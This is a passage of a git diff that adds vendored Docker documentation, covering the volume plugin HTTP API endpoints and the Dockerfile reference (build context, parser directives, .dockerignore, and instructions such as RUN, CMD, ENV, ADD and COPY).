+{
+    "Name": "volume_name",
+    "Opts": {}
+}
+```
+
+Instruct the plugin that the user wants to create a volume, given a user
+specified volume name. The plugin does not need to actually manifest the
+volume on the filesystem yet (until Mount is called).
+Opts is a map of driver specific options passed through from the user request. 
+ +**Response**: +```json +{ + "Err": "" +} +``` + +Respond with a string error if an error occurred. + +### /VolumeDriver.Remove + +**Request**: +```json +{ + "Name": "volume_name" +} +``` + +Delete the specified volume from disk. This request is issued when a user invokes `docker rm -v` to remove volumes associated with a container. + +**Response**: +```json +{ + "Err": "" +} +``` + +Respond with a string error if an error occurred. + +### /VolumeDriver.Mount + +**Request**: +```json +{ + "Name": "volume_name", + "ID": "b87d7442095999a92b65b3d9691e697b61713829cc0ffd1bb72e4ccd51aa4d6c" +} +``` + +Docker requires the plugin to provide a volume, given a user specified volume +name. This is called once per container start. If the same volume_name is requested +more than once, the plugin may need to keep track of each new mount request and provision +at the first mount request and deprovision at the last corresponding unmount request. + +`ID` is a unique ID for the caller that is requesting the mount. + +**Response**: +```json +{ + "Mountpoint": "/path/to/directory/on/host", + "Err": "" +} +``` + +Respond with the path on the host filesystem where the volume has been made +available, and/or a string error if an error occurred. + +### /VolumeDriver.Path + +**Request**: +```json +{ + "Name": "volume_name" +} +``` + +Docker needs reminding of the path to the volume on the host. + +**Response**: +```json +{ + "Mountpoint": "/path/to/directory/on/host", + "Err": "" +} +``` + +Respond with the path on the host filesystem where the volume has been made +available, and/or a string error if an error occurred. `Mountpoint` is optional, +however the plugin may be queried again later if one is not provided. + +### /VolumeDriver.Unmount + +**Request**: +```json +{ + "Name": "volume_name", + "ID": "b87d7442095999a92b65b3d9691e697b61713829cc0ffd1bb72e4ccd51aa4d6c" +} +``` + +Indication that Docker no longer is using the named volume. This is called once +per container stop. 
Plugin may deduce that it is safe to deprovision it at +this point. + +`ID` is a unique ID for the caller that is requesting the mount. + +**Response**: +```json +{ + "Err": "" +} +``` + +Respond with a string error if an error occurred. + + +### /VolumeDriver.Get + +**Request**: +```json +{ + "Name": "volume_name" +} +``` + +Get the volume info. + + +**Response**: +```json +{ + "Volume": { + "Name": "volume_name", + "Mountpoint": "/path/to/directory/on/host", + "Status": {} + }, + "Err": "" +} +``` + +Respond with a string error if an error occurred. `Mountpoint` and `Status` are +optional. + + +### /VolumeDriver.List + +**Request**: +```json +{} +``` + +Get the list of volumes registered with the plugin. + +**Response**: +```json +{ + "Volumes": [ + { + "Name": "volume_name", + "Mountpoint": "/path/to/directory/on/host" + } + ], + "Err": "" +} +``` + +Respond with a string error if an error occurred. `Mountpoint` is optional. + +### /VolumeDriver.Capabilities + +**Request**: +```json +{} +``` + +Get the list of capabilities the driver supports. +The driver is not required to implement this endpoint, however in such cases +the default values will be taken. + +**Response**: +```json +{ + "Capabilities": { + "Scope": "global" + } +} +``` + +Supported scopes are `global` and `local`. Any other value in `Scope` will be +ignored and assumed to be `local`. Scope allows cluster managers to handle the +volume differently, for instance with a scope of `global`, the cluster manager +knows it only needs to create the volume once instead of on every engine. More +capabilities may be added in the future. 
diff --git a/vendor/github.com/docker/docker/docs/reference/builder.md b/vendor/github.com/docker/docker/docs/reference/builder.md new file mode 100644 index 0000000000..6fa5a24150 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/builder.md @@ -0,0 +1,1746 @@ +--- +title: "Dockerfile reference" +description: "Dockerfiles use a simple DSL which allows you to automate the steps you would normally manually take to create an image." +keywords: "builder, docker, Dockerfile, automation, image creation" +--- + + + +# Dockerfile reference + +Docker can build images automatically by reading the instructions from a +`Dockerfile`. A `Dockerfile` is a text document that contains all the commands a +user could call on the command line to assemble an image. Using `docker build` +users can create an automated build that executes several command-line +instructions in succession. + +This page describes the commands you can use in a `Dockerfile`. When you are +done reading this page, refer to the [`Dockerfile` Best +Practices](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/) for a tip-oriented guide. + +## Usage + +The [`docker build`](commandline/build.md) command builds an image from +a `Dockerfile` and a *context*. The build's context is the files at a specified +location `PATH` or `URL`. The `PATH` is a directory on your local filesystem. +The `URL` is a Git repository location. + +A context is processed recursively. So, a `PATH` includes any subdirectories and +the `URL` includes the repository and its submodules. A simple build command +that uses the current directory as context: + + $ docker build . + Sending build context to Docker daemon 6.51 MB + ... + +The build is run by the Docker daemon, not by the CLI. The first thing a build +process does is send the entire context (recursively) to the daemon. In most +cases, it's best to start with an empty directory as context and keep your +Dockerfile in that directory. 
Add only the files needed for building the +Dockerfile. + +>**Warning**: Do not use your root directory, `/`, as the `PATH` as it causes +>the build to transfer the entire contents of your hard drive to the Docker +>daemon. + +To use a file in the build context, the `Dockerfile` refers to the file specified +in an instruction, for example, a `COPY` instruction. To increase the build's +performance, exclude files and directories by adding a `.dockerignore` file to +the context directory. For information about how to [create a `.dockerignore` +file](#dockerignore-file) see the documentation on this page. + +Traditionally, the `Dockerfile` is called `Dockerfile` and located in the root +of the context. You use the `-f` flag with `docker build` to point to a Dockerfile +anywhere in your file system. + + $ docker build -f /path/to/a/Dockerfile . + +You can specify a repository and tag at which to save the new image if +the build succeeds: + + $ docker build -t shykes/myapp . + +To tag the image into multiple repositories after the build, +add multiple `-t` parameters when you run the `build` command: + + $ docker build -t shykes/myapp:1.0.2 -t shykes/myapp:latest . + +Before the Docker daemon runs the instructions in the `Dockerfile`, it performs +a preliminary validation of the `Dockerfile` and returns an error if the syntax is incorrect: + + $ docker build -t test/myapp . + Sending build context to Docker daemon 2.048 kB + Error response from daemon: Unknown instruction: RUNCMD + +The Docker daemon runs the instructions in the `Dockerfile` one-by-one, +committing the result of each instruction +to a new image if necessary, before finally outputting the ID of your +new image. The Docker daemon will automatically clean up the context you +sent. + +Note that each instruction is run independently, and causes a new image +to be created - so `RUN cd /tmp` will not have any effect on the next +instructions. 
+ +Whenever possible, Docker will re-use the intermediate images (cache), +to accelerate the `docker build` process significantly. This is indicated by +the `Using cache` message in the console output. +(For more information, see the [Build cache section](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/#/build-cache)) in the +`Dockerfile` best practices guide: + + $ docker build -t svendowideit/ambassador . + Sending build context to Docker daemon 15.36 kB + Step 1/4 : FROM alpine:3.2 + ---> 31f630c65071 + Step 2/4 : MAINTAINER SvenDowideit@home.org.au + ---> Using cache + ---> 2a1c91448f5f + Step 3/4 : RUN apk update && apk add socat && rm -r /var/cache/ + ---> Using cache + ---> 21ed6e7fbb73 + Step 4/4 : CMD env | grep _TCP= | (sed 's/.*_PORT_\([0-9]*\)_TCP=tcp:\/\/\(.*\):\(.*\)/socat -t 100000000 TCP4-LISTEN:\1,fork,reuseaddr TCP4:\2:\3 \&/' && echo wait) | sh + ---> Using cache + ---> 7ea8aef582cc + Successfully built 7ea8aef582cc + +Build cache is only used from images that have a local parent chain. This means +that these images were created by previous builds or the whole chain of images +was loaded with `docker load`. If you wish to use build cache of a specific +image you can specify it with `--cache-from` option. Images specified with +`--cache-from` do not need to have a parent chain and may be pulled from other +registries. + +When you're done with your build, you're ready to look into [*Pushing a +repository to its registry*](https://docs.docker.com/engine/tutorials/dockerrepos/#/contributing-to-docker-hub). + +## Format + +Here is the format of the `Dockerfile`: + +```Dockerfile +# Comment +INSTRUCTION arguments +``` + +The instruction is not case-sensitive. However, convention is for them to +be UPPERCASE to distinguish them from arguments more easily. + + +Docker runs instructions in a `Dockerfile` in order. 
**The first +instruction must be \`FROM\`** in order to specify the [*Base +Image*](glossary.md#base-image) from which you are building. + +Docker treats lines that *begin* with `#` as a comment, unless the line is +a valid [parser directive](#parser-directives). A `#` marker anywhere +else in a line is treated as an argument. This allows statements like: + +```Dockerfile +# Comment +RUN echo 'we are running some # of cool things' +``` + +Line continuation characters are not supported in comments. + +## Parser directives + +Parser directives are optional, and affect the way in which subsequent lines +in a `Dockerfile` are handled. Parser directives do not add layers to the build, +and will not be shown as a build step. Parser directives are written as a +special type of comment in the form `# directive=value`. A single directive +may only be used once. + +Once a comment, empty line or builder instruction has been processed, Docker +no longer looks for parser directives. Instead it treats anything formatted +as a parser directive as a comment and does not attempt to validate if it might +be a parser directive. Therefore, all parser directives must be at the very +top of a `Dockerfile`. + +Parser directives are not case-sensitive. However, convention is for them to +be lowercase. Convention is also to include a blank line following any +parser directives. Line continuation characters are not supported in parser +directives. 
+ +Due to these rules, the following examples are all invalid: + +Invalid due to line continuation: + +```Dockerfile +# direc \ +tive=value +``` + +Invalid due to appearing twice: + +```Dockerfile +# directive=value1 +# directive=value2 + +FROM ImageName +``` + +Treated as a comment due to appearing after a builder instruction: + +```Dockerfile +FROM ImageName +# directive=value +``` + +Treated as a comment due to appearing after a comment which is not a parser +directive: + +```Dockerfile +# About my dockerfile +FROM ImageName +# directive=value +``` + +The unknown directive is treated as a comment due to not being recognized. In +addition, the known directive is treated as a comment due to appearing after +a comment which is not a parser directive. + +```Dockerfile +# unknowndirective=value +# knowndirective=value +``` + +Non line-breaking whitespace is permitted in a parser directive. Hence, the +following lines are all treated identically: + +```Dockerfile +#directive=value +# directive =value +# directive= value +# directive = value +# dIrEcTiVe=value +``` + +The following parser directive is supported: + +* `escape` + +## escape + + # escape=\ (backslash) + +Or + + # escape=` (backtick) + +The `escape` directive sets the character used to escape characters in a +`Dockerfile`. If not specified, the default escape character is `\`. + +The escape character is used both to escape characters in a line, and to +escape a newline. This allows a `Dockerfile` instruction to +span multiple lines. Note that regardless of whether the `escape` parser +directive is included in a `Dockerfile`, *escaping is not performed in +a `RUN` command, except at the end of a line.* + +Setting the escape character to `` ` `` is especially useful on +`Windows`, where `\` is the directory path separator. `` ` `` is consistent +with [Windows PowerShell](https://technet.microsoft.com/en-us/library/hh847755.aspx). 
+ +Consider the following example which would fail in a non-obvious way on +`Windows`. The second `\` at the end of the second line would be interpreted as an +escape for the newline, instead of a target of the escape from the first `\`. +Similarly, the `\` at the end of the third line would, assuming it was actually +handled as an instruction, cause it be treated as a line continuation. The result +of this dockerfile is that second and third lines are considered a single +instruction: + +```Dockerfile +FROM microsoft/nanoserver +COPY testfile.txt c:\\ +RUN dir c:\ +``` + +Results in: + + PS C:\John> docker build -t cmd . + Sending build context to Docker daemon 3.072 kB + Step 1/2 : FROM microsoft/nanoserver + ---> 22738ff49c6d + Step 2/2 : COPY testfile.txt c:\RUN dir c: + GetFileAttributesEx c:RUN: The system cannot find the file specified. + PS C:\John> + +One solution to the above would be to use `/` as the target of both the `COPY` +instruction, and `dir`. However, this syntax is, at best, confusing as it is not +natural for paths on `Windows`, and at worst, error prone as not all commands on +`Windows` support `/` as the path separator. + +By adding the `escape` parser directive, the following `Dockerfile` succeeds as +expected with the use of natural platform semantics for file paths on `Windows`: + + # escape=` + + FROM microsoft/nanoserver + COPY testfile.txt c:\ + RUN dir c:\ + +Results in: + + PS C:\John> docker build -t succeeds --no-cache=true . + Sending build context to Docker daemon 3.072 kB + Step 1/3 : FROM microsoft/nanoserver + ---> 22738ff49c6d + Step 2/3 : COPY testfile.txt c:\ + ---> 96655de338de + Removing intermediate container 4db9acbb1682 + Step 3/3 : RUN dir c:\ + ---> Running in a2c157f842f5 + Volume in drive C has no label. + Volume Serial Number is 7E6D-E0F7 + + Directory of c:\ + + 10/05/2016 05:04 PM 1,894 License.txt + 10/05/2016 02:22 PM

Program Files + 10/05/2016 02:14 PM Program Files (x86) + 10/28/2016 11:18 AM 62 testfile.txt + 10/28/2016 11:20 AM Users + 10/28/2016 11:20 AM Windows + 2 File(s) 1,956 bytes + 4 Dir(s) 21,259,096,064 bytes free + ---> 01c7f3bef04f + Removing intermediate container a2c157f842f5 + Successfully built 01c7f3bef04f + PS C:\John> + +## Environment replacement + +Environment variables (declared with [the `ENV` statement](#env)) can also be +used in certain instructions as variables to be interpreted by the +`Dockerfile`. Escapes are also handled for including variable-like syntax +into a statement literally. + +Environment variables are notated in the `Dockerfile` either with +`$variable_name` or `${variable_name}`. They are treated equivalently and the +brace syntax is typically used to address issues with variable names with no +whitespace, like `${foo}_bar`. + +The `${variable_name}` syntax also supports a few of the standard `bash` +modifiers as specified below: + +* `${variable:-word}` indicates that if `variable` is set then the result + will be that value. If `variable` is not set then `word` will be the result. +* `${variable:+word}` indicates that if `variable` is set then `word` will be + the result, otherwise the result is the empty string. + +In all cases, `word` can be any string, including additional environment +variables. + +Escaping is possible by adding a `\` before the variable: `\$foo` or `\${foo}`, +for example, will translate to `$foo` and `${foo}` literals respectively. + +Example (parsed representation is displayed after the `#`): + + FROM busybox + ENV foo /bar + WORKDIR ${foo} # WORKDIR /bar + ADD . $foo # ADD . 
/bar + COPY \$foo /quux # COPY $foo /quux + +Environment variables are supported by the following list of instructions in +the `Dockerfile`: + +* `ADD` +* `COPY` +* `ENV` +* `EXPOSE` +* `LABEL` +* `USER` +* `WORKDIR` +* `VOLUME` +* `STOPSIGNAL` + +as well as: + +* `ONBUILD` (when combined with one of the supported instructions above) + +> **Note**: +> prior to 1.4, `ONBUILD` instructions did **NOT** support environment +> variable, even when combined with any of the instructions listed above. + +Environment variable substitution will use the same value for each variable +throughout the entire command. In other words, in this example: + + ENV abc=hello + ENV abc=bye def=$abc + ENV ghi=$abc + +will result in `def` having a value of `hello`, not `bye`. However, +`ghi` will have a value of `bye` because it is not part of the same command +that set `abc` to `bye`. + +## .dockerignore file + +Before the docker CLI sends the context to the docker daemon, it looks +for a file named `.dockerignore` in the root directory of the context. +If this file exists, the CLI modifies the context to exclude files and +directories that match patterns in it. This helps to avoid +unnecessarily sending large or sensitive files and directories to the +daemon and potentially adding them to images using `ADD` or `COPY`. + +The CLI interprets the `.dockerignore` file as a newline-separated +list of patterns similar to the file globs of Unix shells. For the +purposes of matching, the root of the context is considered to be both +the working and the root directory. For example, the patterns +`/foo/bar` and `foo/bar` both exclude a file or directory named `bar` +in the `foo` subdirectory of `PATH` or in the root of the git +repository located at `URL`. Neither excludes anything else. + +If a line in `.dockerignore` file starts with `#` in column 1, then this line is +considered as a comment and is ignored before interpreted by the CLI. 
+ +Here is an example `.dockerignore` file: + +``` +# comment + */temp* + */*/temp* + temp? +``` + +This file causes the following build behavior: + +| Rule | Behavior | +|----------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| `# comment` | Ignored. | +| `*/temp*` | Exclude files and directories whose names start with `temp` in any immediate subdirectory of the root. For example, the plain file `/somedir/temporary.txt` is excluded, as is the directory `/somedir/temp`. | +| `*/*/temp*` | Exclude files and directories starting with `temp` from any subdirectory that is two levels below the root. For example, `/somedir/subdir/temporary.txt` is excluded. | +| `temp?` | Exclude files and directories in the root directory whose names are a one-character extension of `temp`. For example, `/tempa` and `/tempb` are excluded. + + +Matching is done using Go's +[filepath.Match](http://golang.org/pkg/path/filepath#Match) rules. A +preprocessing step removes leading and trailing whitespace and +eliminates `.` and `..` elements using Go's +[filepath.Clean](http://golang.org/pkg/path/filepath/#Clean). Lines +that are blank after preprocessing are ignored. + +Beyond Go's filepath.Match rules, Docker also supports a special +wildcard string `**` that matches any number of directories (including +zero). For example, `**/*.go` will exclude all files that end with `.go` +that are found in all directories, including the root of the build context. + +Lines starting with `!` (exclamation mark) can be used to make exceptions +to exclusions. The following is an example `.dockerignore` file that +uses this mechanism: + +``` + *.md + !README.md +``` + +All markdown files *except* `README.md` are excluded from the context. 
+ +The placement of `!` exception rules influences the behavior: the last +line of the `.dockerignore` that matches a particular file determines +whether it is included or excluded. Consider the following example: + +``` + *.md + !README*.md + README-secret.md +``` + +No markdown files are included in the context except README files other than +`README-secret.md`. + +Now consider this example: + +``` + *.md + README-secret.md + !README*.md +``` + +All of the README files are included. The middle line has no effect because +`!README*.md` matches `README-secret.md` and comes last. + +You can even use the `.dockerignore` file to exclude the `Dockerfile` +and `.dockerignore` files. These files are still sent to the daemon +because it needs them to do its job. But the `ADD` and `COPY` commands +do not copy them to the image. + +Finally, you may want to specify which files to include in the +context, rather than which to exclude. To achieve this, specify `*` as +the first pattern, followed by one or more `!` exception patterns. + +**Note**: For historical reasons, the pattern `.` is ignored. + +## FROM + + FROM + +Or + + FROM : + +Or + + FROM @ + +The `FROM` instruction sets the [*Base Image*](glossary.md#base-image) +for subsequent instructions. As such, a valid `Dockerfile` must have `FROM` as +its first instruction. The image can be any valid image – it is especially easy +to start by **pulling an image** from the [*Public Repositories*](https://docs.docker.com/engine/tutorials/dockerrepos/). + +- `FROM` must be the first non-comment instruction in the `Dockerfile`. + +- `FROM` can appear multiple times within a single `Dockerfile` in order to create +multiple images. Simply make a note of the last image ID output by the commit +before each new `FROM` command. + +- The `tag` or `digest` values are optional. If you omit either of them, the builder +assumes a `latest` by default. The builder returns an error if it cannot match +the `tag` value. 
+ +## RUN + +RUN has 2 forms: + +- `RUN ` (*shell* form, the command is run in a shell, which by +default is `/bin/sh -c` on Linux or `cmd /S /C` on Windows) +- `RUN ["executable", "param1", "param2"]` (*exec* form) + +The `RUN` instruction will execute any commands in a new layer on top of the +current image and commit the results. The resulting committed image will be +used for the next step in the `Dockerfile`. + +Layering `RUN` instructions and generating commits conforms to the core +concepts of Docker where commits are cheap and containers can be created from +any point in an image's history, much like source control. + +The *exec* form makes it possible to avoid shell string munging, and to `RUN` +commands using a base image that does not contain the specified shell executable. + +The default shell for the *shell* form can be changed using the `SHELL` +command. + +In the *shell* form you can use a `\` (backslash) to continue a single +RUN instruction onto the next line. For example, consider these two lines: + +``` +RUN /bin/bash -c 'source $HOME/.bashrc; \ +echo $HOME' +``` +Together they are equivalent to this single line: + +``` +RUN /bin/bash -c 'source $HOME/.bashrc; echo $HOME' +``` + +> **Note**: +> To use a different shell, other than '/bin/sh', use the *exec* form +> passing in the desired shell. For example, +> `RUN ["/bin/bash", "-c", "echo hello"]` + +> **Note**: +> The *exec* form is parsed as a JSON array, which means that +> you must use double-quotes (") around words not single-quotes ('). + +> **Note**: +> Unlike the *shell* form, the *exec* form does not invoke a command shell. +> This means that normal shell processing does not happen. For example, +> `RUN [ "echo", "$HOME" ]` will not do variable substitution on `$HOME`. +> If you want shell processing then either use the *shell* form or execute +> a shell directly, for example: `RUN [ "sh", "-c", "echo $HOME" ]`. 
+> When using the exec form and executing a shell directly, as in the case for +> the shell form, it is the shell that is doing the environment variable +> expansion, not docker. +> +> **Note**: +> In the *JSON* form, it is necessary to escape backslashes. This is +> particularly relevant on Windows where the backslash is the path separator. +> The following line would otherwise be treated as *shell* form due to not +> being valid JSON, and fail in an unexpected way: +> `RUN ["c:\windows\system32\tasklist.exe"]` +> The correct syntax for this example is: +> `RUN ["c:\\windows\\system32\\tasklist.exe"]` + +The cache for `RUN` instructions isn't invalidated automatically during +the next build. The cache for an instruction like +`RUN apt-get dist-upgrade -y` will be reused during the next build. The +cache for `RUN` instructions can be invalidated by using the `--no-cache` +flag, for example `docker build --no-cache`. + +See the [`Dockerfile` Best Practices +guide](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/#/build-cache) for more information. + +The cache for `RUN` instructions can be invalidated by `ADD` instructions. See +[below](#add) for details. + +### Known issues (RUN) + +- [Issue 783](https://github.com/docker/docker/issues/783) is about file + permissions problems that can occur when using the AUFS file system. You + might notice it during an attempt to `rm` a file, for example. + + For systems that have recent aufs version (i.e., `dirperm1` mount option can + be set), docker will attempt to fix the issue automatically by mounting + the layers with `dirperm1` option. More details on `dirperm1` option can be + found at [`aufs` man page](https://github.com/sfjro/aufs3-linux/tree/aufs3.18/Documentation/filesystems/aufs) + + If your system doesn't have support for `dirperm1`, the issue describes a workaround. 
+ +## CMD + +The `CMD` instruction has three forms: + +- `CMD ["executable","param1","param2"]` (*exec* form, this is the preferred form) +- `CMD ["param1","param2"]` (as *default parameters to ENTRYPOINT*) +- `CMD command param1 param2` (*shell* form) + +There can only be one `CMD` instruction in a `Dockerfile`. If you list more than one `CMD` +then only the last `CMD` will take effect. + +**The main purpose of a `CMD` is to provide defaults for an executing +container.** These defaults can include an executable, or they can omit +the executable, in which case you must specify an `ENTRYPOINT` +instruction as well. + +> **Note**: +> If `CMD` is used to provide default arguments for the `ENTRYPOINT` +> instruction, both the `CMD` and `ENTRYPOINT` instructions should be specified +> with the JSON array format. + +> **Note**: +> The *exec* form is parsed as a JSON array, which means that +> you must use double-quotes (") around words not single-quotes ('). + +> **Note**: +> Unlike the *shell* form, the *exec* form does not invoke a command shell. +> This means that normal shell processing does not happen. For example, +> `CMD [ "echo", "$HOME" ]` will not do variable substitution on `$HOME`. +> If you want shell processing then either use the *shell* form or execute +> a shell directly, for example: `CMD [ "sh", "-c", "echo $HOME" ]`. +> When using the exec form and executing a shell directly, as in the case for +> the shell form, it is the shell that is doing the environment variable +> expansion, not docker. + +When used in the shell or exec formats, the `CMD` instruction sets the command +to be executed when running the image. + +If you use the *shell* form of the `CMD`, then the `` will execute in +`/bin/sh -c`: + + FROM ubuntu + CMD echo "This is a test." | wc - + +If you want to **run your** `` **without a shell** then you must +express the command as a JSON array and give the full path to the executable. 
+**This array form is the preferred format of `CMD`.** Any additional parameters
+must be individually expressed as strings in the array:
+
+    FROM ubuntu
+    CMD ["/usr/bin/wc","--help"]
+
+If you would like your container to run the same executable every time, then
+you should consider using `ENTRYPOINT` in combination with `CMD`. See
+[*ENTRYPOINT*](#entrypoint).
+
+If the user specifies arguments to `docker run` then they will override the
+default specified in `CMD`.
+
+> **Note**:
+> Don't confuse `RUN` with `CMD`. `RUN` actually runs a command and commits
+> the result; `CMD` does not execute anything at build time, but specifies
+> the intended command for the image.
+
+## LABEL
+
+    LABEL <key>=<value> <key>=<value> <key>=<value> ...
+
+The `LABEL` instruction adds metadata to an image. A `LABEL` is a
+key-value pair. To include spaces within a `LABEL` value, use quotes and
+backslashes as you would in command-line parsing. A few usage examples:
+
+    LABEL "com.example.vendor"="ACME Incorporated"
+    LABEL com.example.label-with-value="foo"
+    LABEL version="1.0"
+    LABEL description="This text illustrates \
+    that label-values can span multiple lines."
+
+An image can have more than one label. To specify multiple labels,
+Docker recommends combining labels into a single `LABEL` instruction where
+possible. Each `LABEL` instruction produces a new layer which can result in an
+inefficient image if you use many labels. This example results in a single image
+layer.
+
+    LABEL multi.label1="value1" multi.label2="value2" other="value3"
+
+The above can also be written as:
+
+    LABEL multi.label1="value1" \
+          multi.label2="value2" \
+          other="value3"
+
+Labels are additive including `LABEL`s in `FROM` images. If Docker
+encounters a label/key that already exists, the new value overrides any previous
+labels with identical keys.
+
+To view an image's labels, use the `docker inspect` command.
+ + "Labels": { + "com.example.vendor": "ACME Incorporated" + "com.example.label-with-value": "foo", + "version": "1.0", + "description": "This text illustrates that label-values can span multiple lines.", + "multi.label1": "value1", + "multi.label2": "value2", + "other": "value3" + }, + +## MAINTAINER (deprecated) + + MAINTAINER + +The `MAINTAINER` instruction sets the *Author* field of the generated images. +The `LABEL` instruction is a much more flexible version of this and you should use +it instead, as it enables setting any metadata you require, and can be viewed +easily, for example with `docker inspect`. To set a label corresponding to the +`MAINTAINER` field you could use: + + LABEL maintainer "SvenDowideit@home.org.au" + +This will then be visible from `docker inspect` with the other labels. + +## EXPOSE + + EXPOSE [...] + +The `EXPOSE` instruction informs Docker that the container listens on the +specified network ports at runtime. `EXPOSE` does not make the ports of the +container accessible to the host. To do that, you must use either the `-p` flag +to publish a range of ports or the `-P` flag to publish all of the exposed +ports. You can expose one port number and publish it externally under another +number. + +To set up port redirection on the host system, see [using the -P +flag](run.md#expose-incoming-ports). The Docker network feature supports +creating networks without the need to expose ports within the network, for +detailed information see the [overview of this +feature](https://docs.docker.com/engine/userguide/networking/)). + +## ENV + + ENV + ENV = ... + +The `ENV` instruction sets the environment variable `` to the value +``. This value will be in the environment of all "descendant" +`Dockerfile` commands and can be [replaced inline](#environment-replacement) in +many as well. + +The `ENV` instruction has two forms. The first form, `ENV `, +will set a single variable to a value. 
The entire string after the first
+space will be treated as the `<value>` - including characters such as
+spaces and quotes.
+
+The second form, `ENV <key>=<value> ...`, allows for multiple variables to
+be set at one time. Notice that the second form uses the equals sign (=)
+in the syntax, while the first form does not. Like command line parsing,
+quotes and backslashes can be used to include spaces within values.
+
+For example:
+
+    ENV myName="John Doe" myDog=Rex\ The\ Dog \
+        myCat=fluffy
+
+and
+
+    ENV myName John Doe
+    ENV myDog Rex The Dog
+    ENV myCat fluffy
+
+will yield the same net results in the final image, but the first form
+is preferred because it produces a single cache layer.
+
+The environment variables set using `ENV` will persist when a container is run
+from the resulting image. You can view the values using `docker inspect`, and
+change them using `docker run --env <key>=<value>`.
+
+> **Note**:
+> Environment persistence can cause unexpected side effects. For example,
+> setting `ENV DEBIAN_FRONTEND noninteractive` may confuse apt-get
+> users on a Debian-based image. To set a value for a single command, use
+> `RUN <key>=<value> <command>`.
+
+## ADD
+
+ADD has two forms:
+
+- `ADD <src>... <dest>`
+- `ADD ["<src>",... "<dest>"]` (this form is required for paths containing
+whitespace)
+
+The `ADD` instruction copies new files, directories or remote file URLs from `<src>`
+and adds them to the filesystem of the image at the path `<dest>`.
+
+Multiple `<src>` resources may be specified but if they are files or
+directories then they must be relative to the source directory that is
+being built (the context of the build).
+
+Each `<src>` may contain wildcards and matching will be done using Go's
+[filepath.Match](http://golang.org/pkg/path/filepath#Match) rules. For example:
+
+    ADD hom* /mydir/        # adds all files starting with "hom"
+    ADD hom?.txt /mydir/    # ?
is replaced with any single character, e.g., "home.txt" + +The `` is an absolute path, or a path relative to `WORKDIR`, into which +the source will be copied inside the destination container. + + ADD test relativeDir/ # adds "test" to `WORKDIR`/relativeDir/ + ADD test /absoluteDir/ # adds "test" to /absoluteDir/ + +All new files and directories are created with a UID and GID of 0. + +In the case where `` is a remote file URL, the destination will +have permissions of 600. If the remote file being retrieved has an HTTP +`Last-Modified` header, the timestamp from that header will be used +to set the `mtime` on the destination file. However, like any other file +processed during an `ADD`, `mtime` will not be included in the determination +of whether or not the file has changed and the cache should be updated. + +> **Note**: +> If you build by passing a `Dockerfile` through STDIN (`docker +> build - < somefile`), there is no build context, so the `Dockerfile` +> can only contain a URL based `ADD` instruction. You can also pass a +> compressed archive through STDIN: (`docker build - < archive.tar.gz`), +> the `Dockerfile` at the root of the archive and the rest of the +> archive will be used as the context of the build. + +> **Note**: +> If your URL files are protected using authentication, you +> will need to use `RUN wget`, `RUN curl` or use another tool from +> within the container as the `ADD` instruction does not support +> authentication. + +> **Note**: +> The first encountered `ADD` instruction will invalidate the cache for all +> following instructions from the Dockerfile if the contents of `` have +> changed. This includes invalidating the cache for `RUN` instructions. +> See the [`Dockerfile` Best Practices +guide](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/#/build-cache) for more information. 
+ + +`ADD` obeys the following rules: + +- The `` path must be inside the *context* of the build; + you cannot `ADD ../something /something`, because the first step of a + `docker build` is to send the context directory (and subdirectories) to the + docker daemon. + +- If `` is a URL and `` does not end with a trailing slash, then a + file is downloaded from the URL and copied to ``. + +- If `` is a URL and `` does end with a trailing slash, then the + filename is inferred from the URL and the file is downloaded to + `/`. For instance, `ADD http://example.com/foobar /` would + create the file `/foobar`. The URL must have a nontrivial path so that an + appropriate filename can be discovered in this case (`http://example.com` + will not work). + +- If `` is a directory, the entire contents of the directory are copied, + including filesystem metadata. + +> **Note**: +> The directory itself is not copied, just its contents. + +- If `` is a *local* tar archive in a recognized compression format + (identity, gzip, bzip2 or xz) then it is unpacked as a directory. Resources + from *remote* URLs are **not** decompressed. When a directory is copied or + unpacked, it has the same behavior as `tar -x`, the result is the union of: + + 1. Whatever existed at the destination path and + 2. The contents of the source tree, with conflicts resolved in favor + of "2." on a file-by-file basis. + + > **Note**: + > Whether a file is identified as a recognized compression format or not + > is done solely based on the contents of the file, not the name of the file. + > For example, if an empty file happens to end with `.tar.gz` this will not + > be recognized as a compressed file and **will not** generate any kind of + > decompression error message, rather the file will simply be copied to the + > destination. + +- If `` is any other kind of file, it is copied individually along with + its metadata. 
In this case, if `` ends with a trailing slash `/`, it + will be considered a directory and the contents of `` will be written + at `/base()`. + +- If multiple `` resources are specified, either directly or due to the + use of a wildcard, then `` must be a directory, and it must end with + a slash `/`. + +- If `` does not end with a trailing slash, it will be considered a + regular file and the contents of `` will be written at ``. + +- If `` doesn't exist, it is created along with all missing directories + in its path. + +## COPY + +COPY has two forms: + +- `COPY ... ` +- `COPY ["",... ""]` (this form is required for paths containing +whitespace) + +The `COPY` instruction copies new files or directories from `` +and adds them to the filesystem of the container at the path ``. + +Multiple `` resource may be specified but they must be relative +to the source directory that is being built (the context of the build). + +Each `` may contain wildcards and matching will be done using Go's +[filepath.Match](http://golang.org/pkg/path/filepath#Match) rules. For example: + + COPY hom* /mydir/ # adds all files starting with "hom" + COPY hom?.txt /mydir/ # ? is replaced with any single character, e.g., "home.txt" + +The `` is an absolute path, or a path relative to `WORKDIR`, into which +the source will be copied inside the destination container. + + COPY test relativeDir/ # adds "test" to `WORKDIR`/relativeDir/ + COPY test /absoluteDir/ # adds "test" to /absoluteDir/ + +All new files and directories are created with a UID and GID of 0. + +> **Note**: +> If you build using STDIN (`docker build - < somefile`), there is no +> build context, so `COPY` can't be used. + +`COPY` obeys the following rules: + +- The `` path must be inside the *context* of the build; + you cannot `COPY ../something /something`, because the first step of a + `docker build` is to send the context directory (and subdirectories) to the + docker daemon. 
